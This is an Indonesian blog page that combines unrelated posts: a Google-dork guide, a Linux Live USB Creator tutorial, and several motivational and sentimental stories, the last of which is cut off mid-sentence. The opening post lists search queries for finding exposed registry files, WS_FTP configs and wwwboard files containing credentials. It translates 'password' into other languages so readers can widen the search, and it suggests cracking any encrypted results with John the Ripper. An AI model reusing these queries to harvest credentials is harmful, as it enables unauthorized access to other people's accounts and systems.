———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”defaultusername” intext: |credentials
”defaultpassword”
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”internet account manager” |credentials
———————————————————
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials
“parent directory”
———————————————————
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
———————————————————
inurl:/wwwboard |wwwboard user credentials
———————————————————

mungkin temen2 ada yang ingin melihat password dari website jerman?
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.

—————————————————–
BAHASA |KATA-KATA| TRANSLATE
—————————————————–
German |password | Kennwort
Spanish |password | contraseña
French |password | mot de passe
Italian |password | parola d’accesso
Portuguese |password | senha
Dutch |password | Paswoord
—————————————————–

setelah temen2 banyak mendapatkan password, apa yang akan anda lakukan?jangan berbuat jahat yang pasti, lihat2 saja isinya atau anda terlalu baik dengan memberitahu admin. jangan lupa sediakan john the ripper dirumah, sapa tau password yang disimpan sudah dalam keadaan terenkripsi.

keterangan :
karena ketidak teraturan kata2 pada artikel ini, setelah tanda “|” berarti itu merupakan keterangan dari kata kunci. MOHON MAAF


0 komentar

Linux Live USB Creator

Dengan semakin banyak dan berkembangnya Sistem Operasi Linux, terutama banyaknya distro Linux gratis yang bisa kita gunakan seperti Ubuntu, Kubuntu, Fedora, PCLinuxOS dan lainnya, mungkin membuat sebagian yang belum pernah mencoba penasaran. Bagi pengguna Windows, ada alternatif untuk mencoba tanpa harus install di komputer, dengan menggunakan USB Flashdisk saja.

Sebelumnya saya juga pernah mengulas tentang Membuat Bootable Linux dalam USB Flashdisk dengan software UNetBootin. Kini ada alternatif software lain yang lebih mudah dan juga mempunyai beberapa kelabihan lain, yaitu Linux Live USB Creator ( disingkat LiLi ).

Linux Live USB Creator mendukung berbagai distro Linux, selengkapnya bisa dilihat di Supportes Linuxes. Selain bisa membuat bootable USB Linux, dengan Lili ini, kita juga bisa membuat Linux langsung berjalan di windows tanpa harus booting. Dibanding UNetBootin, penggunaannya juga lebih mudah.


5 Langkah Mudah

Untuk membuat Bootable Linux dalam USB, software ini memberikan 5 langkah mudah. Ketika menjalankan pertama kali, langsung tampil ke-5 langkah ini dengan penjelasan yang mudah diikuti. Berikut tampilan awal program ini :

Penjelasan Langkah-langkahnya sebagai berikut:

  1. Pilih USB Flashdisk yang akan di isi dengan Linux, USB harus dengan Format FAT atau FAT32. Jika USB sudah FAT atau FAT32, kita tidak perlu mem-formatnya.
  2. Langkah ini adalah memilih sumber distro Linux, bisa dari CD-ROM, file ISO yang sudah ada di hardisk atau jika kita punya koneksi internet yang cepat, pilih Download (langsung download dari internet)
  3. PERSISTENCE, merupakan pengaturan besarnya space USB yang akan digunakan untuk menyimpan data, konfigurasi yang kita ubah atau jika kita nanti ingin menginstall software tambahan di linux USB ini. Jika ini tidak di isi ( 0 MB), maka Linux di USB tetap bisa dijalankan, tetapi perubahan data di linux tidak akan tersimpan. Serta kita tidak bisa menyimpan data di linux dan menginstall software tambahan lain.
  4. Langkah 4 ini ada 3 pilihan : yang pertama apakah file-file yang diuat akan di sembunyikan (hidden), kedua apakah USB akan di format ( semua data akan hilang) dan ketiga untuk membuat versi portable di windows (perlu koneksi internet)
  5. Langkah terkhir adalah CREATE, klik icon halilintar warna kuning untuk mulai proses pembuatan. Sebelumnya kita bisa mengatur opsi tambahan dengan klik tombol OPTIONS

Setelah langkah 5 selesai, maka USB kita sudah berisi Linux dan siap kita coba. Restart komputer dan atur BIOS agar booting pertama kali membaca USB Flashdisk ( jika belum tahu bisa membaca artikel saya sebelumnya : Bagaimana mengatur BIOS agar Komputer Booting dari USB Flashdisk ? ). Di rekomendasikan memasang USB di port komputer bagian belakang.


Penjelasan tentang PERSISTENCE

Dengan adanya fitur Persistence, setelah kita booting dan menjalankan linux, maka segala perubahan (setting) atau penambahan file bisa tersimpan di USB. Kita juga bisa menginstall software di linux dan software ini akan tersimpan meski kita restart komputer atau booting ulang.

Jika Persistence ini di isi 0 MB, maka perubahan setting atau data di linux (misalnya mengubah theme/tampilan, wallpaper dsb) akan hilang ketika kita menjalankan ulang Linux di USB. Dan sampai artikel ini ditulis, jika kita menjalankan Linux USB ini secara langsung dari windows ( dengan VirtualBox ), maka fitur Persistence belum bekerja.


Membuat Versi Portable di windows

Di langkah ke 4 terdapat pilihan untuk membuat Linux bisa langsung dijalankan di windows tanpa harus booting. Tetapi jika ini dipilih, installasi akan memerlukan koneksi internet untuk download software tambahan, yaitu VirtualBox ( besarnya sekitar 68 MB). Dengan koneksi yang terbatas, tentu ini akan merepotkan, apalagi jika belum selesai tetapi proses pembuatan gagal di tengah jalan.

Alternatifnya, jika ingin membuat versi Windows, kita bisa download VirtualBox secara terpisah dari link yang sudah disediakan ( Download Portable Virtual Box – 68 MB). Selanjutnya Extract (atau buka virtual box) dan letakkan semuanya di USB yang sudah berisi linux yang sudah dibuat.

Setelah di extract ke USB akan ada folder bernama VirtualBox. Selanjutnya kita tinggal membuka folder ini dan menjalankan file Virtualize_This_Key.exe.


Download:
- Linux Live USB Creator Versi Installer (3 MB)
- Linux Live USB Creator Versi Portable (3.1 MB)


Informasi selengkapnya silahkan mengunjungi LinuxLiveUSB.

Sumber Ebsoft

0 komentar

Kehidupan Sang Elang


Elang merupakan jenis unggas yang mempunyai umur paling panjang didunia. Umurnya dapat mencapai 70 tahun. Tetapi untuk mencapai umur sepanjang itu seekor elang harus membuat suatu keputusan yang sangat berat pada umurnya yang ke 40.

Ketika elang berumur 40 tahun, cakarnya mulai menua, paruhnya menjadi panjang dan membengkok hingga hampir menyentuh dadanya. Sayapnya menjadi sangat berat karena bulunya telah tumbuh lebat dan tebal,sehingga sangat menyulitkan waktu terbang.

Pada saat itu, elang hanya mempunyai dua pilihan: Menunggu kematian, atau Mengalami suatu proses transformasi yang sangat menyakitkan - suatuproses transformasi yang panjang selama 150 hari.

Untuk melakukan transformasi itu, elang harus berusaha keras terbang keatas puncak gunung untuk kemudian membuat sarang ditepi jurang , berhenti dan tinggal disana selama proses transformasi berlangsung.

Pertama-tama, elang harus mematukkan paruhnya pada batu karang sampai paruh tersebut terlepas dari mulutnya, kemudian berdiam beberapa lama menunggu tumbuhnya paruh baru.

Dengan paruh yang baru tumbuh itu, ia harus mencabut satu persatu cakar-cakarnya dan ketika cakar yang baru sudah tumbuh, ia akan mencabut bulu badannya satu demi satu. Suatu proses yang panjang dan menyakitkan. Lima bulan kemudian, bulu-bulu elang yang baru
sudah tumbuh. Elang mulai dapat terbang kembali. Dengan paruh dan cakar baru, elang tersebut mulai menjalani 30 tahun kehidupan barunya dengan penuh energi!

...

Sahabat, Dalam kehidupan kita ini, kadang kita juga harus melakukan suatu keputusan yang sangat berat untuk memulai sesuatu proses pembaharuan. Kita harus berani dan mau membuang semua kebiasaan lama yang mengikat, meskipun kebiasaan lama itu adalah sesuatu yang menyenangkan dan melenakan.

Kita harus rela untuk meninggalkan perilaku lama kita agar kita dapat mulai terbang lagi menggapai tujuan yang lebih baik di masa depan. Hanya bila kita bersedia melepaskan beban lama, membuka diri untuk belajar hal-hal yang baru, kita baru mempunyai kesempatan
untuk mengembangkan kemampuan kita yang terpendam, mengasah keahlian baru dan menatap masa depan dengan penuh keyakinan.

Halangan terbesar untuk berubah terletak di dalam diri sendiri dan andalah sang penguasa atas diri anda. Jangan biarkan masa lalu menumpulkan asa dan melayukan semangat kita.
Karena Anda adalah elang-elang itu.

Perubahan pasti terjadi. Maka itu, kita harus berubah! Salam Motivasi...!

(Diposting oleh : Swans Liang Faith)



Credit: http://www.facebook.com/group.php?gid=158903054127509
0 komentar

"Nasi Bungkus"

Di suatu sore hari pada saat aku pulang kantor dengan mengendarai sepeda motor, aku disuguhkan suatu drama kecil yang sangat menarik, seorang anak kecil berumur lebih kurang sepuluh tahun dengan sangat sigapnya menyalip disela-sela kepadatan kendaraan di sebuah lampu merah perempatan jalan di Jakarta .

Dengan membawa bungkusan yang cukup banyak diayunkannya sepeda berwarna biru muda, sambil membagikan bungkusan tersebut ,ia menyapa akrab setiap orang, dari tukang koran , penyapu jalan, tuna wisma sampai Pak Polisi.

Pemandangan ini membuatku tertarik, pikiran ku langsung melayang membayangkan apa yang diberikan si anak kecil tersebut dengan bungkusannya, apakah dia berjualan ? “Kalau dia berjualan apa mungkin seorang tuna wisma menjadi langganan tetapnya atau…??, untuk membunuh rasa penasaran ku, aku pun membuntuti si anak kecil tersebut sampai di sebrang jalan , setelah itu aku langsung menyapa anak tersebut untuk aku ajak berbincang-bincang.

”Dek, boleh kakak bertanya ?” tanyaku.

“Silahkan kak.” Jawab adik kecil.

“Kalau boleh tahu yang barusan Adik bagikan ketukang koran, tukang sapu, peminta-minta bahkan pak polisi, itu apa ?” tanyaku dengan heran.

“Oh… itu bungkusan nasi dan sedikit lauk kak… memang kenapa kak?” dengan sedikit heran , sambil ia balik bertanya.

”Oh... tidak! Kakak Cuma tertarik cara kamu membagikan bungkusan itu, kelihatan kamu sudah terbiasa dan cukup akrab dengan mereka. Apa kamu sudah lama kenal dengan mereka?”

Lalu ,Adik kecil ini mulai bercerita, “Dulu … aku dan ibuku sama seperti mereka hanya seorang tuna wisma, setiap hari bekerja hanya mengharapkan belaskasihan banyak orang, dan seperti kakak ketahui hidup di Jakarta begitu sulit, sampai kami sering tidak makan, waktu siang hari kami kepanasan dan waktu malam hari kami kedinginan ditambah lagi pada musim hujan kami sering kehujanan.”

“Apabila kami mengingat waktu dulu… kami sangat-sangat sedih , namun setelah ibuku membuka warung nasi, kehidupan keluarga kami mulai membaik. Maka dari itu ibu selalu mengingatkanku, bahwa masih banyak orang yang susah seperti kita dulu , jadi kalau saat ini kita diberi rejeki yang cukup , kenapa kita tidak dapat berbagi kepada mereka.”

”Yang ibu ku selalu katakan ‘hidup harus berarti buat banyak orang ‘, karena pada saat kita kembali kepada Sang Pencipta tidak ada yang kita bawa, hanya satu yang kita bawa yaitu Kasih kepada sesama serta Amal dan Perbuatan baik kita , kalau hari ini kita bisa mengamalkan sesuatu yang baik buat banyak orang , kenapa kita harus tunda.”

”Karena menurut ibuku umur manusia terlalu singkat , hari ini kita memiliki segalanya, namun satu jam kemudian atau besok kita dipanggil Sang Pencipta, apa yang kita bawa?”

Kata-kata adik kecil ini sangat menusuk hatiku, saat itu juga aku merasa menjadi orang yang tidak berguna, bahkan aku merasa tidak lebih dari seonggok sampah yang tidak ada gunanya,dibandingkan adik kecil ini.

Aku yang selama ini merasa menjadi orang hebat dengan pendidikan dan jabatan tinggi, namun untuk hal seperti ini, aku merasa lebih bodoh dari anak kecil ini, aku malu dan sangat malu. Ya.. Tuhan, Ampuni aku, ternyata kekayaan, kehebatan dan jabatan tidak mengantarku kepada Mu.

Hanya Kasih yang sempurna serta Iman dan Pengharapan kepada-Mu lah yang dapat mengiringiku masuk ke Surga. Terima kasih adik kecil, kamu adalah malaikat ku yang menyadarkan aku dari tidur nyenyakku.

(Oleh : Laila Nurul Muna)

...

Sahabat CCM yang hebat!,... Kasih itu sabar; kasih itu murah hati; ia tidak cemburu.Ia tidak memegahkan diri dan tidak sombong.Ia tidak melakukan yang tidak sopan dan tidak mencari keuntungan diri sendiri.Ia tidak pemarah dan tidak menyimpan kesalahan orang lain.Ia tidak bersuka cita karena ketidakadilan, tetapi karena kebenaran.Ia menutupi segala sesuatu, percaya segala sesuatu, mengharapkan segala sesuatu, sabar menanggung segala sesuatu.Kasih tidak berkesudahan...

Janganlah ragu , mulailah dari sekarang membiasakan diri berbagi dan memberi walaupun itu untuk perkara-perkara kecil ....MALULAH kita kepada TUHAN , berapa besar rizki yang DIA berikan untuk kita dan BERAPA BANYAK yang kita berikan untuk NYA ....?


Di Sadur dari : http://www.facebook.com/group.php?gid=158903054127509

0 komentar

8 Kebohongan

Dalam kehidupan kita sehari-hari, kita percaya bahwa kebohongan akan membuat manusia terpuruk dalam penderitaan yang mendalam, tetapi kisah ini justru sebaliknya. Dengan adanya kebohongan ini, makna sesungguhnya dari kebohongan ini justru dapat membuka mata kita dan terbebas dari penderitaan, ibarat sebuah energi yang mampu mendorong mekarnya sekuntum bunga yang paling indah di dunia.



Cerita bermula ketika aku masih kecil, aku terlahir sebagai seorang anak laki-laki di sebuah keluarga yang miskin. Bahkan untuk makan saja, seringkali kekurangan. Ketika makan, ibu sering memberikan porsi nasinya untukku. Sambil memindahkan nasi ke mangkukku, ibu berkata :

“Makanlah nak, aku tidak lapar” ———-KEBOHONGAN IBU YANG PERTAMA



Ketika saya mulai tumbuh dewasa, ibu yang gigih sering meluangkan waktu senggangnya untuk pergi memancing di kolam dekiat rumah, ibu berharap dari ikan hasil pancingan, ia bisa memberikan sedikit makanan bergizi untuk petumbuhan. Sepulang memancing, ibu memasak sup ikan yang segar dan mengundang selera. Sewaktu aku memakan sup ikan itu, ibu duduk disamping gw dan memakan sisa daging ikan yang masih menempel di tulang yang merupakan bekas sisa tulang ikan yang aku makan. Aku melihat ibu seperti itu, hati juga tersentuh, lalu menggunakan sumpitku dan memberikannya kepada ibuku. Tetapi ibu dengan cepat menolaknya, ia berkata :

“Makanlah nak, aku tidak suka makan ikan” ———- KEBOHONGAN IBU YANG KEDUA



Sekarang aku sudah masuk SMP, demi membiayai sekolah abang dan kakakku, ibu pergi ke koperasi untuk membawa sejumlah kotak korek api untuk ditempel, dan hasil tempelannya itu


membuahkan sedikit uang untuk menutupi kebutuhan hidup. Di kala musim dingin tiba, aku bangun dari tempat tidurku, melihat ibu masih bertumpu pada lilin kecil dan dengan gigihnya melanjutkan pekerjaannya menempel kotak korek api. Aku berkata :”Ibu, tidurlah, udah malam, besok pagi ibu masih harus kerja.” Ibu tersenyum dan berkata :

“Cepatlah tidur nak, aku tidak capek” ———- KEBOHONGAN IBU YANG KETIGA



Ketika ujian tiba, ibu meminta cuti kerja supaya dapat menemaniku pergi ujian. Ketika hari sudah siang, terik matahari mulai ibu yang tegar dan gigih menunggu aku di bawah terik matahari selama beberapa jam. Ketika bunyi lonceng berbunyi, menandakan ujian sudah


selesai. Ibu dengan segera menyambutku dan menuangkan teh yang sudah disiapkan dalam botol yang dingin untukku. Teh yang begitu kental tidak dapat dibandingkan dengan kasih sayang yang jauh lebih kental. Melihat ibu yang dibanjiri peluh, aku segera memberikan gelasku untuk ibu sambil menyuruhnya minum. Ibu berkata :

“Minumlah nak, aku tidak haus!” ———- KEBOHONGAN IBU YANG KEEMPAT



Setelah kepergian ayah karena sakit, ibu yang malang harus merangkap sebagai ayah dan ibu. Dengan berpegang pada pekerjaan dia yang dulu, dia harus membiayai kebutuhan hidup sendiri.


Kehidupan keluarga kita pun semakin susah dan susah. Tiada hari tanpa penderitaan. Melihat


kondisi keluarga yang semakin parah, ada paman yang baik hati yang tinggal di dekat rumahku pun membantu ibuku baik masalah besar maupun masalah kecil. Tetangga yang ada di


sebelah rumah melihat kehidupan kita yang begitu sengsara, seringkali menasehati ibuku untuk


menikah lagi. Tetapi ibu yang memang keras kepala tidak mengindahkan nasehat mereka, ibu berkata :

“Saya tidak butuh cinta” ———-KEBOHONGAN IBU YANG KELIMA



Setelah aku, kakakku dan abangku semuanya sudah tamat dari sekolah dan bekerja, ibu yang sudah tua sudah waktunya pensiun. Tetapi ibu tidak mau, ia rela untuk pergi ke pasar setiap pagi untuk jualan sedikit sayur untuk memenuhi kebutuhan hidupnya. Kakakku dan abangku yang bekerja di luar kota sering mengirimkan sedikit uang untuk membantu memenuhi kebutuhan ibu, tetapi ibu bersikukuh tidak mau menerima uang tersebut. Malahan mengirim balik uang tersebut. Ibu berkata :

“Saya punya duit” ———-KEBOHONGAN IBU YANG KEENAM



Setelah lulus dari S1, aku pun melanjutkan studi ke S2 dan kemudian memperoleh gelar master di sebuah universitas ternama di Amerika berkat sebuah beasiswa di sebuah perusahaan. Akhirnya aku pun bekerja di perusahaan itu. Dengan gaji yang lumayan tinggi, aku bermaksud


membawa ibuku untuk menikmati hidup di Amerika. Tetapi ibu yang baik hati, bermaksud tidak mau merepotkan anaknya, ia berkata kepadaku

“Aku tidak terbiasa” ———-KEBOHONGAN IBU YANG KETUJUH



Setelah memasuki usianya yang tua, ibu terkena penyakit kanker lambung, harus dirawat di rumah sakit, aku yang berada jauh di seberang samudra atlantik langsung segera pulang untuk menjenguk ibunda tercinta. Aku melihat ibu yang terbaring lemah di ranjangnya setelah menjalani operasi. Ibu yang keliatan sangat tua, menatap aku dengan penuh kerinduan. Walaupun senyum yang tersebar di wajahnya terkesan agak kaku karena sakit yang ditahannya. Terlihat dengan jelas betapa penyakit itu menjamahi tubuh ibuku sehingga ibuku terlihat lemah dan kurus kering. Aku sambil menatap ibuku sambil berlinang air mata. Hatiku perih, sakit sekali melihat ibuku dalam kondisi ini. Tetapi ibu dengan tegarnya berkata :

“Jangan menangis anakku,Aku tidak kesakitan” ———-KEBOHONGAN IBU YANG KEDELAPAN.



Setelah mengucapkan kebohongannya yang kedelapan, ibuku tercinta menutup matanya untuk yang terakhir kalinya.

Dari cerita di atas, saya percaya teman-teman sekalian pasti merasa tersentuh dan ingin sekali mengucapkan : ” Terima kasih ibu ! ”


(Sumber : Unknown)


~~~


Sahabat, izinkan saya mengutip ayat dari Kitab Suci,


"Dan Kami perintahkan kepada manusia (berbuat baik) kepada dua orang Ibu Bapanya, Ibunya telah mengandungnya dalam keadaan lemah yang bertambah-tambah dan menyapihnya dalam dua tahun. Maka bersyukurlah kepada-Ku dan kepada kedua orang Ibu Bapakmu, hanya kepada-Ku-lah kembalimu." (QS. Luqman : 14).


Bagi, para sahabat yang masih memiliki ibu, maka... berbaktilah dengan kesungguhan berbakti... karna jikalau beliau sudah tiada, maka yang ada adalah sebuah penyesalan. Saat ini mungkin kita jenuh omelan beliau... tapi setelah beliau tiada, kita akan rindu omelan beliau... kita akan rindu senyum tulusnya... kita akan rindu, keringat badanya yang terkuras karena memikirkan kita....


Ya Robb..... izinkan saya untuk mampu berbakti kepada Beliau dan mengangkat derajatnya dengan membangun peradaban universal, hingga akhir hidupku....


http://www.facebook.com/note.php?created&&note_id=10150380195580405&id=166628915325 0 komentar

From The True Story…

diceritakan oleh Lu Di dan di edit oleh
Lian Shu Xiang


Sebuah salah pengertian yg mengakibatkan kehancuran sebuah rumah tangga.


Tatkala nilai akhir sebuah kehidupan sudah terbuka,tetapi
segalanya sudah terlambat. Membawa nenek utk tinggal bersama
menghabiskan masa tuanya bersama kami, malah telah menghianati ikrar
cinta yg telah kami buat selama ini,setelah 2 tahun menikah, saya dan
suami setuju menjemput nenek di kampung utk tinggal bersama .


Sejak kecil suami saya telah kehilangan ayahnya, dia adalah satu-satunya
harapan nenek, nenek pula yg membesarkannya dan menyekolahkan dia hingga
tamat kuliah.
Saya terus mengangguk tanda setuju, kami segera menyiapkan sebuah kamar
yg menghadap taman untuk nenek, agar dia dapat berjemur, menanam bunga
dan sebagainya. Suami berdiri didepan kamar yg sangat kaya dgn sinar
matahari,tidak sepatah katapun yg terucap tiba-tiba saja dia mengangkat
saya dan memutar-mutar saya seperti adegan dalam film India dan berkata
:”Mari,kita jemput nenek di kampung”.


Suami berbadan tinggi besar, aku suka sekali menyandarkan kepalaku ke
dadanya yg bidang, ada suatu perasaan nyaman dan aman disana. Aku
seperti sebuah boneka kecil yg kapan saja bisa diangkat dan dimasukan
kedalam kantongnya. Kalau terjadi selisih paham diantara kami, dia suka
tiba-tiba mengangkatku tinggi-tinggi diatas kepalanya dan diputar-putar
sampai aku berteriak ketakutan baru diturunkan.Aku sungguh menikmati
saat-saat seperti itu.


Kebiasaan nenek di kampung tidak berubah. Aku suka sekali menghias rumah
dengan bunga segar, sampai akhirnya nenek tidak tahan lagi dan berkata
kepada suami:”Istri kamu hidup foya-foya, buat apa beli bunga? Kan bunga
tidak bisa dimakan?” Aku menjelaskannya kepada nenek:”Ibu, rumah dengan
bunga segar membuat rumah terasa lebih nyaman dan suasana hati lebih
gembira.”Nenek berlalu sambil mendumel, suamiku berkata sambil tertawa:
“Ibu, ini kebiasaan orang kota , lambat laun ibu akan terbiasa juga.”


Nenek tidak protes lagi, tetapi setiap kali melihatku pulang sambil
membawa bunga,dia tidak bisa menahan diri untuk bertanya berapa harga
bunga itu, setiap mendengar jawabanku dia selalu mencibir sambil
menggeleng-gelengkan kepala. Setiap membawa pulang barang belanjaan,dia
selalu tanya itu berapa harganya ,ini berapa.Setiap aku jawab, dia
selalu berdecak dengan suara keras.Suamiku memencet hidungku sambil
berkata:”Putriku, kan kamu bisa berbohong.Jangan katakan harga yang
sebenarnya.” Lambat laun, keharmonisan dalam rumah tanggaku mulai terusik.


Nenek sangat tidak bisa menerima melihat suamiku bangun pagi menyiapkan
sarapan pagi untuk dia sendiri, di mata nenek seorang anak laki-laki
masuk ke dapur adalah hal yang sangat memalukan. Di meja makan, wajah
nenek selalu cemberut dan aku sengaja seperti tidak mengetahuinya. Nenek
selalu membuat bunyi-bunyian dengan alat makan seperti sumpit dan
sendok, itulah cara dia protes.


Aku adalah instrukstur tari, seharian terus menari membuat badanku
sangat letih, aku tidak ingin membuang waktu istirahatku dengan bangun
pagi apalagi disaat musim dingin. Nenek kadang juga suka membantuku di
dapur, tetapi makin dibantu aku menjadi semakin repot, misalnya; dia
suka menyimpan semua kantong-kantong bekas belanjaan, dikumpulkan bisa
untuk dijual katanya.Jadilah rumahku seperti tempat pemulungan kantong
plastik, dimana-mana terlihat kantong plastik besar tempat semua
kumpulan kantong plastik.


Kebiasaan nenek mencuci piring bekas makan tidak menggunakan cairan
pencuci, agar supaya dia tidak tersinggung, aku selalu mencucinya sekali
lagi pada saat dia sudah tidur.Suatu hari, nenek mendapati aku sedang
mencuci piring malam harinya, dia segera masukke kamar sambil membanting
pintu dan menangis..Suamiku jadi serba salah, malam itu kami tidur
seperti orang bisu, aku coba bermanja-manja dengan dia, tetapi dia tidak
perduli. Aku menjadi kecewa dan marah.”Apa salahku?” Dia melotot sambil
berkata:”Kenapa tidak kamu biarkan saja? Apakah memakan dengan pring itu
bisa membuatmu mati?”


Aku dan nenek tidak bertegur sapa untuk waktu yg culup lama, suasana
mejadi kaku. Suamiku menjadi sangat kikuk, tidak tahu harus berpihak
pada siapa? Nenek tidak lagi membiarkan suamiku masuk ke dapur, setiap
pagi dia selalu bangun lebih pagi dan menyiapkan sarapan untuknya, suatu
kebahagiaan terpancar di wajahnya jika melihat suamiku makan dengan
lahap, dengan sinar mata yang seakan mencemohku sewaktu melihat padaku,
seakan berkata dimana tanggung jawabmu sebagai seorang istri?
Demi menjaga suasana pagi hari tidak terganggu, aku selalu membeli
makanan diluar pada saat berangkat kerja. Saat tidur, suami berkata:”Lu
di, apakah kamu merasa masakan ibu tidak enak dan tidak bersih sehingga
kamu tidak pernah makan di rumah?” sambil memunggungiku dia berkata
tanpa menghiraukan air mata yg mengalir di kedua belah pipiku.Dan dia
akhirnya berkata:”Anggaplah ini sebuah permintaanku, makanlah bersama
kami setiap pagi.”Aku mengiyakannya dan kembali ke meja makan yg serba
canggung itu.


Pagi itu nenek memasak bubur, kami sedang makan dan tiba-tiba ada suatu
perasaan yg sangat mual menimpaku, seakan-akan isi perut mau keluar
semua.Aku menahannya sambil berlari ke kamar mandi, sampai disana aku
segera mengeluarkan semua isi perut. Setelah agak reda, aku melihat
suamiku berdiri didepan pintu kamar mandi dan memandangku dengan sinar
mata yg tajam, diluar sana terdengar suara tangisan nenek dan
berkata-kata dengan bahasa daerahnya. Aku terdiam dan terbengong tanpa
bisa berkata-kata. Sungguh bukan sengaja aku berbuat demikian!.
Pertama kali dalam perkawinanku, aku bertengkar hebat dengan suamiku,
nenek melihat kami dengan mata merah dan berjalan menjauh……suamiku
segera mengejarnya keluar rumah.


Menyambut anggota baru tetapi dibayar dengan nyawa nenek.
Selama 3 hari suamiku tidak pulang ke rumah dan tidak juga meneleponku.
Aku sangat kecewa, semenjak kedatangan nenek di rumah ini, aku sudah
banyak mengalah, mau bagaimana lagi? Entah kenapa aku selalu merasa mual
dan kehilangan nafsu makan ditambah lagi dengan keadaan rumahku yang
kacau, sungguh sangat menyebalkan. Akhirnya teman sekerjaku berkata:”Lu
Di, sebaiknya kamu periksa ke dokter.”Hasil pemeriksaan menyatakan aku
sedang hamil. Aku baru sadar mengapa aku mual-mual pagi itu. Sebuah
berita gembira yg terselip juga kesedihan. Mengapa suami dan nenek
sebagai orang yg berpengalaman tidak berpikir sampai sejauh itu?


Di pintu masuk rumah sakit aku melihat suamiku, 3 hari tidak bertemu dia
berubah drastis, muka kusut kurang tidur, aku ingin segera berlalu
tetapi rasa iba membuatku tertegun dan memanggilnya. Dia melihat ke
arahku tetapi seakan akan tidak mengenaliku lagi, pandangan matanya
penuh dengan kebencian dan itu melukaiku. Aku berkata pada diriku
sendiri, jangan lagi melihatnya dan segera memanggil taksi. Padahal aku
ingin memberitahunya bahwa kami akan segera memiliki seorang anak. Dan
berharap aku akan diangkatnya tinggi-tinggi dan diputar-putar sampai aku
minta ampun tetapi….. mimpiku tidak menjadi kenyataan. Didalam taksi
air mataku mengalir dengan deras. Mengapa kesalah pahaman ini berakibat
sangat buruk?


Sampai di rumah aku berbaring di ranjang memikirkan peristiwa tadi,
memikirkan sinar matanya yg penuh dengan kebencian, aku menangis dengan
sedihnya. Tengah malam,aku mendengar suara orang membuka laci, aku
menyalakan lampu dan melihat dia dgn wajah berlinang air mata sedang
mengambil uang dan buku tabungannya. Aku nenatapnya dengan dingin tanpa
berkata-kata. Dia seperti tidak melihatku saja dan segera berlalu.
Sepertinya dia sudah memutuskan utk meninggalkan aku. Sungguh lelaki yg
sangat picik, dalam saat begini dia masih bisa membedakan antara cinta
dengan uang. Aku tersenyum sambil menitikan air mata.


Aku tidak masuk kerja keesokan harinya, aku ingin secepatnya membereskan
masalah ini, aku akan membicarakan semua masalah ini dan pergi
mencarinya di kantornya.Di kantornya aku bertemu dengan seketarisnya yg
melihatku dengan wajah bingung.”Ibunya pak direktur baru saja mengalami
kecelakaan lalu lintas dan sedang berada di rumah sakit. Mulutku terbuka
lebar.Aku segera menuju rumah sakit dan saat menemukannya, nenek sudah
meninggal. Suamiku tidak pernah menatapku, wajahnya kaku. Aku memandang
jasad nenek yg terbujur kaku. Sambil menangis aku menjerit dalam
hati:”Tuhan, mengapa ini bisa terjadi?”
Sampai selesai upacara pemakaman, suamiku tidak pernah bertegur sapa
denganku,

jika memandangku selalu dengan pandangan penuh dengan kebencian.


Peristiwa kecelakaan itu aku juga tahu dari orang lain, pagi itu nenek
berjalan ke arah terminal, rupanya dia mau kembali ke kampung. Suamiku
mengejar sambil berlari, nenek juga berlari makin cepat sampai tidak
melihat sebuah bus yg datang ke arahnya dengan kencang. Aku baru
mengerti mengapa pandangan suamiku penuh dengan kebencian. Jika aku
tidak muntah pagi itu, jika kami tidak bertengkar,
jika………….dimatanya, akulah penyebab kematian nenek.


Suamiku pindah ke kamar nenek, setiap malam pulang kerja dengan badan
penuh dengan bau asap rokok dan alkohol. Aku merasa bersalah tetapi juga
merasa harga diriku terinjak-injak. Aku ingin menjelaskan bahwa semua
ini bukan salahku dan juga memberitahunya bahwa kami akan segera
mempunyai anak. Tetapi melihat sinar matanya, aku tidak pernah
menjelaskan masalah ini. Aku rela dipukul atau dimaki-maki olehnya
walaupun ini bukan salahku. Waktu berlalu dengan sangat lambat.Kami
hidup serumah tetapi seperti tidak mengenal satu sama lain. Dia pulang
makin larut malam. Suasana tegang didalam rumah.


Suatu hari, aku berjalan melewati sebuah café, melalui keremangan lampu
dan kisi-kisi jendela, aku melihat suamiku dengan seorang wanita
didalam. Dia sedang menyibak rambut sang gadis dengan mesra. Aku
tertegun dan mengerti apa yg telah terjadi. Aku masuk kedalam dan
berdiri di depan mereka sambil menatap tajam kearahnya. Aku tidak
menangis juga tidak berkata apapun karena aku juga tidak tahu harus
berkata apa. Sang gadis melihatku dan ke arah suamiku dan segera hendak
berlalu. Tetapi dicegah oleh suamiku dan menatap kembali ke arahku
dengan sinar mata yg tidak kalah tajam dariku. Suara detak jangtungku
terasa sangat keras, setiap detak suara seperti suara menuju kematian.


Akhirnya aku mengalah dan berlalu dari hadapan mereka, jika tidak..
mungkin aku akan jatuh bersama bayiku dihadapan mereka.
Malam itu dia tidak pulang ke rumah. Seakan menjelaskan padaku apa yang
telah terjadi. Sepeninggal nenek, rajutan cinta kasih kami juga
sepertinya telah berakhir. Dia tidak kembali lagi ke rumah, kadang
sewaktu pulang ke rumah, aku mendapati lemari seperti bekas dibongkar.
Aku tahu dia kembali mengambil barang-barang keperluannya. Aku tidak
ingin menelepon dia walaupun kadang terbersit suatu keinginan untuk
menjelaskan semua ini. Tetapi itu tidak terjadi………, semua berlalu
begitu saja.


Aku mulai hidup seorang diri, pergi check kandungan seorang diri. Setiap
kali melihat sepasang suami istri sedang check kandungan bersama, hati
ini serasa hancur. Teman-teman menyarankan agar aku membuang saja bayi
ini, tetapi aku seperti orang yg sedang histeris mempertahankan
miliknya. Hitung-hitung sebagai pembuktian kepada nenek bahwa aku tidak
bersalah.


“Suatu hari pulang kerja,aku melihat dia duduk didepan ruang tamu.
Ruangan penuh dengan asap rokok dan ada selembar kertas diatas meja,
tidak perlu tanya aku juga tahu surat apa itu.2 bulan hidup sendiri, aku
sudah bisa mengontrol emosi. Sambil membuka mantel dan topi aku berkata
kepadanya:”"Tunggu sebentar, aku akan segera menanda tanganinya”".Dia
melihatku dengan pandangan awut-awutan demikian juga aku. Aku berkata
pada diri sendiri, jangan menangis, jangan menangis. Mata ini terasa
sakit sekali tetapi aku terus bertahan agar air mata ini tidak keluar.


Selesai membuka mantel, aku berjalan ke arahnya dan ternyata dia
